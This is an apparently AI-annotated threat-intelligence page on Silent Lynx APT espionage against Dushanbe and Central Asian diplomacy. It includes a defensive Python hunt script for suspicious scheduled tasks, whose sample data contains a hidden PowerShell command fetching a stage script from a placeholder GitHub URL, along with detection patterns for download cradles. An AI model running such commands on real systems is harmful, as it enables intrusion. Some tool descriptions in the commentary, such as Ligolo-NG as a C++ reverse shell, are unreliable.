
Operation Peek-a-Baku: Silent Lynx APT Targets Dushanbe with Espionage Campaign

NetmanageIT OpenCTI - opencti.netmanageit.com




SUMMARY:

The Silent Lynx APT group has been conducting espionage campaigns targeting Central Asian nations, Russia, China, and Azerbaijan. Two main campaigns were identified: one focusing on Russia-Azerbaijan relations and another on China-Central Asia relations. The group uses various malware including PowerShell scripts, .NET implants, and C++ reverse shells. They leverage spear-phishing with malicious attachments, GitHub-hosted payloads, and scheduled tasks for persistence. The campaigns aim to gather intelligence on diplomatic communications, transportation projects, and other strategic initiatives. Silent Lynx shows a pattern of targeting summit meetings and infrastructure deals in the region, with a particular focus on events in Dushanbe, Tajikistan.

OPENCTI LABELS:

.net,reverse shell,china,apt,powershell,espionage,russia,central asia,azerbaijan,silentsweeper,silent loader,ligolo-ng,laplas


AI COMMENTARY:

1. Operation Peek-a-Baku emerged as a concerted espionage campaign orchestrated by the Silent Lynx APT group, known for its precision in targeting high-value geopolitical events. This operation zeroes in on Dushanbe, Tajikistan, exploiting the backdrop of diplomatic engagements and infrastructure negotiations. The group’s historical footprint spans Central Asian nations, Russia, China, and Azerbaijan, underlining its strategic focus on regions where political alliances and economic ventures intersect. Silent Lynx has earned its reputation through SilentSweeper and Silent Loader toolsets, demonstrating a consistent ability to infiltrate sensitive networks.

2. The campaign unfolds in two main thrusts: one probing Russia-Azerbaijan relations and another delving into China-Central Asia ties. In the Russia-Azerbaijan vector, operatives seek to intercept communications and documents tied to energy corridors and military partnerships. Meanwhile, the China-Central Asia axis focuses on Belt and Road transportation projects, high-level summit planning, and infrastructure financing agreements. Both prongs converge on summit meetings in Dushanbe, revealing an intent to gather real-time intelligence ahead of diplomatic talks and project milestones.

3. Silent Lynx deploys a multifaceted arsenal comprising PowerShell scripts, .NET implants, and C++ reverse shells such as Ligolo-NG. Initial access is frequently gained through spear-phishing emails carrying malicious attachments or links to GitHub-hosted payloads. Once inside a network, the group establishes persistence via scheduled tasks and leverages Laplas techniques to mask communications with command-and-control servers. The reverse shell capabilities enable remote code execution and data exfiltration under the radar of conventional security platforms.

4. The principal objective of this espionage campaign is to harvest intelligence on diplomatic communications, transportation project schedules, and financing details. By monitoring these elements, Silent Lynx can influence negotiations or gain a strategic edge in regional power dynamics. Insights into summit agendas and bilateral agreements provide actionable data for state sponsors or affiliated organizations aligned with the APT’s interests.

5. The implications of Operation Peek-a-Baku extend well beyond Tajikistan’s borders. Nations involved in regional infrastructure deals must recognize the increased risk of targeted espionage. The sophistication of .NET implants and reverse shell techniques highlights the evolving threat landscape, demanding a reassessment of current defenses. Central Asia’s growing economic significance makes it an appealing target for APT groups seeking to capitalize on the flow of diplomatic and commercial information.

6. To counter the Silent Lynx campaign, organizations should implement advanced email filtering, endpoint detection and response solutions tuned to PowerShell and .NET anomalies, and network segmentation to isolate critical assets. Regular threat hunting exercises focusing on C++ reverse shell indicators and anomalous scheduled task configurations can unearth hidden implants. Collaboration with regional partners and threat intelligence sharing will help anticipate future APT movements.
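The persistence technique in point 3 (scheduled tasks launching PowerShell and GitHub-hosted payloads) and the hunting advice in point 6 (anomalous scheduled-task configurations, PowerShell anomalies) can be turned into a concrete hunt over Windows Security event 4698 ("A scheduled task was created"), which embeds the full task definition as XML. The script below is an added example written for this page; it is not code from the report or from NetmanageIT, and none of the task names, user names or URLs in it are indicators from the campaign. The event-dictionary shape, the scoring weights, the threshold and the sample events are all assumptions constructed for the example; the task-definition XML namespace is the real one used by Task Scheduler.

```python
"""Hunt for suspicious scheduled-task creations in Windows Security event 4698
records. 4698 embeds the task definition as XML in its TaskContent field; the
heuristics below score the traits the report describes: PowerShell launched
with evasion switches, a GitHub-hosted payload download, a hidden task, and a
logon/boot trigger used for persistence. Sample events, weights and threshold
are constructed for this example (assumptions, not taken from the report)."""
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field

# Real namespace used by Task Scheduler task definitions
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Script hosts that rarely belong in a vendor-installed task's <Command>
SCRIPT_HOSTS = re.compile(r"(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32)(\.exe)?", re.I)

# Argument traits; each pattern counts once per Exec action (weights are assumptions)
SUSPICIOUS_ARGS = [
    (re.compile(r"-(enc|encodedcommand|e)\b", re.I), "encoded PowerShell command"),
    (re.compile(r"-(w|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(nop|noprofile)\b", re.I), "profile bypass"),
    (re.compile(r"bypass", re.I), "execution policy bypass"),
    (re.compile(r"raw\.githubusercontent\.com|github\.com/\S+/releases/download", re.I),
     "GitHub-hosted payload download"),
    (re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b", re.I),
     "download cradle"),
]
PERSISTENCE_TRIGGERS = {"LogonTrigger", "BootTrigger"}
DEFAULT_THRESHOLD = 4  # assumption: tune against your own baseline of task creations


@dataclass
class Finding:
    task_name: str
    user: str
    commands: list
    reasons: list = field(default_factory=list)
    score: int = 0


def _tag(elem):
    """Strip the namespace from an element tag: '{ns}LogonTrigger' -> 'LogonTrigger'."""
    return elem.tag.rsplit("}", 1)[-1]


def score_task(event):
    """Score one 4698 event (dict with TaskName, SubjectUserName, TaskContent)."""
    root = ET.fromstring(event["TaskContent"].strip())
    finding = Finding(event["TaskName"], event["SubjectUserName"], [])

    def hit(points, reason):
        finding.score += points
        finding.reasons.append(reason)

    for ex in root.findall(".//t:Actions/t:Exec", NS):
        cmd = (ex.findtext("t:Command", default="", namespaces=NS) or "").strip()
        args = (ex.findtext("t:Arguments", default="", namespaces=NS) or "").strip()
        finding.commands.append(f"{cmd} {args}".strip())
        exe = re.split(r"[\\/]", cmd)[-1]  # basename, Windows or POSIX separators
        if SCRIPT_HOSTS.fullmatch(exe):
            hit(2, f"script host launched: {exe}")
        for pattern, reason in SUSPICIOUS_ARGS:
            if pattern.search(args):
                hit(2, reason)

    if (root.findtext(".//t:Settings/t:Hidden", default="", namespaces=NS) or "").lower() == "true":
        hit(1, "task hidden from the scheduler UI")
    if root.findtext(".//t:Principals/t:Principal/t:RunLevel", default="", namespaces=NS) == "HighestAvailable":
        hit(1, "requests highest available privileges")
    triggers = root.find(".//t:Triggers", NS)
    if triggers is not None:
        kinds = {_tag(child) for child in triggers} & PERSISTENCE_TRIGGERS
        if kinds:
            hit(1, "persistence trigger: " + ", ".join(sorted(kinds)))
    return finding


def flag_suspicious_tasks(events, threshold=DEFAULT_THRESHOLD):
    """Return findings at or above the threshold, highest score first."""
    findings = [score_task(e) for e in events]
    return sorted((f for f in findings if f.score >= threshold), key=lambda f: -f.score)


def _task_xml(command, arguments, trigger, hidden="false", run_level="LeastPrivilege"):
    """Build a minimal task definition (constructed test data)."""
    return f"""<Task version="1.2" xmlns="{NS['t']}">
  <Triggers><{trigger}><Enabled>true</Enabled></{trigger}></Triggers>
  <Principals><Principal id="Author"><RunLevel>{run_level}</RunLevel></Principal></Principals>
  <Settings><Hidden>{hidden}</Hidden></Settings>
  <Actions Context="Author"><Exec><Command>{command}</Command><Arguments>{arguments}</Arguments></Exec></Actions>
</Task>"""


SAMPLE_EVENTS = [  # constructed 4698 events; names and the URL are placeholders, not report IoCs
    {"TaskName": r"\Microsoft\Windows\UpdateCheck", "SubjectUserName": "jdoe",
     "TaskContent": _task_xml(
         r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         r'-NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest '
         r'-Uri https://raw.githubusercontent.com/EXAMPLE-ORG/EXAMPLE-REPO/main/stage.ps1 '
         r'-OutFile C:\Users\Public\stage.ps1"',
         "LogonTrigger", hidden="true", run_level="HighestAvailable")},
    {"TaskName": r"\Vendor\BackupNightly", "SubjectUserName": "SYSTEM",
     "TaskContent": _task_xml(r"C:\Program Files\Vendor\backup.exe", "--full", "CalendarTrigger")},
    {"TaskName": r"\IT\Inventory", "SubjectUserName": "svc_inventory",
     "TaskContent": _task_xml(
         r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         r"-ExecutionPolicy RemoteSigned -File C:\Scripts\inventory.ps1", "LogonTrigger")},
]

if __name__ == "__main__":
    for f in flag_suspicious_tasks(SAMPLE_EVENTS):
        print(f"[{f.score}] {f.task_name} by {f.user}: {'; '.join(f.reasons)}")
```

The third sample event is the deliberate edge case: an administrator's PowerShell task with a logon trigger scores, but stays under the threshold because it carries none of the evasion switches or download traits, which is what keeps a hunt like this from drowning in legitimate automation. In production the events would come from a SIEM query or `Get-WinEvent` export rather than the constructed list, and the weights should be re-tuned against a baseline of the environment's own task creations.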

7. Operation Peek-a-Baku underscores the persistent threat posed by state-sponsored espionage in Central Asia. By dissecting the tactics, techniques, and procedures of Silent Lynx, defenders can strengthen their posture against complex campaigns targeting diplomatic and infrastructure initiatives. Vigilance, proactive defense measures, and international cooperation remain essential to safeguarding sensitive projects and communications from sophisticated APT groups.



